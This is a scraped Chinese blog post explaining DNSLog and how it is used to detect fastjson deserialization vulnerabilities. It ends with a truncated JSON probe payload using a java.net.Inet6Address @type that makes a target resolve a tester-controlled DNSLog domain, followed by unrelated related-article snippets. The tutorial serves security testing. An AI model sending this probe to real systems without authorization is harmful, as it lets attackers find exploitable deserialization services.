35-3 使用dnslog探测fastjson漏洞

news/2024/4/30 7:49:05 标签: 安全, 网络, web安全

一、DNSLog 原理

        DNSLog是一种记录在DNS上的域名相关信息的机制,类似于日志文件,记录了对域名或IP的访问信息。了解多级域名的概念对理解DNSLog至关重要。因特网采用树状结构的命名方法,按照组织结构划分域,每个域都是名字空间中被管理的一个划分,可以进一步划分为子域。域名可以被分为多级,如一级域名、二级域名、三级域名等。从右到左,域名地址依次是顶级域名、二级域名、三级域名。

        举例来说,假设有一个域名kxsy.work,将其解析设置为对应的IP地址2.2.2.2。当向DNS服务器发起kxsy.work的解析请求时,DNSLog会记录下此次解析,包括解析的域名和对应的IP地址。我们可以利用这些记录来进行漏洞测试,这个过程就是DNSLog。

二、在线的 DNSLog 平台

  • CEYE - Monitor service for security testing
  • DNSLog Platform

之前的文章有讲过这两个平台的使用这里就不多说了

 三、利用 dnslog 测试是否有漏洞

payload

# dnslog 是指你自己的dnslog子域名

{"a": {"@type": "java.net.Inet6Address", "val": "dnslog"

http://www.niftyadmin.cn/n/5481592.html

相关文章

springboot+nodejs+vue残联残疾人信息服务系统django+python设计与实现

前端开发框架:vue.js 框架支持:django/sprinngboot/php/Ssm/flask/express均支持 语言:pythonjavanode.jsphp均支持 数据库 mysql 版本不限 数据库工具:Navicat/SQLyog等都可以 运行软件:idea/eclipse/vscode/pycharm/wamp/phpstudy均支持 设计框架&…

tcp 为什么要三次握手

TCP三次握手流程: 首先客户端发起请求,想服务端发送SYN报文服务端接收到客户端请求过后,产生SYNACK报文,并将SYNACK报文返回给客户端客户端收到SYNACK报文之后将此报文再发回服务端,至此三次握手完成,连接…

鸿蒙开发 一 (二)、熟悉鸿蒙之剑 ArkTS

ArkTS是HarmonyOS主要应用开发语言,以后也别在弄那个 java 和鸿蒙的混合版了, 没必要浪费时间, 一步到位, 学新的吧。 简介 ArkTS围绕应用开发在TypeScript(简称TS)生态基础上做了进一步扩展,保…

90天玩转Python—16—基础知识篇:面向对象知识详解

90天玩转Python系列文章目录 90天玩转Python—01—基础知识篇:C站最全Python标准库总结 90天玩转Python--02--基础知识篇:初识Python与PyCharm 90天玩转Python—03—基础知识篇:Python和PyCharm(语言特点、学习方法、工具安装) 90天玩转Python—04—基础知识篇:Pytho…

SpringBoot和Vue2项目配置https协议

1、SpringBoot项目 ① 去你自己的云申请并下载好相关文件,SpringBoot下载的是Tomcat(默认),Vue2下载的是Nginx ② 将下载的压缩包里面的.pfx后缀文件拷贝到项目的resources目录下 ③ 编辑配置文件 (主要是框里面的内…

“植物大战僵尸:机器学习引领游戏AI新革命“

上期回顾: 今天给大家推荐一个Gtihub开源项目:PythonPlantsVsZombies,翻译成中就是植物大战僵尸。 《植物大战僵尸》是一款极富策略性的小游戏。可怕的僵尸即将入侵,每种僵尸都有不同的特点,例如铁桶僵尸拥有极强的抗…

牛客论坛项目中使用到Redis的地方总结

实体分为很多类,实体的确定要通过实体类型和实体id两个属性同时确定。牛客论坛中使用到了3类实体: 1 登录 使用到的Redis命令: set key value // 设置指定key的值为value get key // 获取指定key的值1.1 存储/获取验证码 验证码文本&…

Java Set基础篇

目录 前言一、常用Set1.1 Set1.1.1 特点 1.2 HashSet1.2.1 特点1.2.2 使用 1.3 TreeSet1.3.1 特点1.3.2 使用 1.4 LinkedHashSet1.4.1 特点1.4.2 使用 二、对比总结 目录 前言 一、常用Set 1.1 Set Set是一个继承自Collection的接口&#xff1a; public interface Set<…